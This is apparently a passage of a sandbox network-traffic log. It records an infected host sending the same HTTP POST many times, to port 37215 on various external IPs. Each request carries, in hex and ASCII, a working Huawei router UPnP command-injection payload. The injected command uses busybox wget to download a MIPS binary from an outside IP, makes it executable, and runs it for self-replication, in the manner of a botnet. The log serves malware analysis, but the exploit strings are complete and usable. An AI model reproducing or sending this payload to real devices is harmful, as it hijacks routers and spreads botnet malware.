                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    46192.168.2.1457976197.29.9.13037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.121413946 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.507260084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    47192.168.2.145224841.80.154.1037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.122972965 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.534168959 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    48192.168.2.1457512197.5.82.14837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.122972965 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.547111988 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    49192.168.2.1451580219.72.118.9437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.123871088 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.485035896 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    50192.168.2.1453598132.170.141.137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.124938011 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.469392061 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
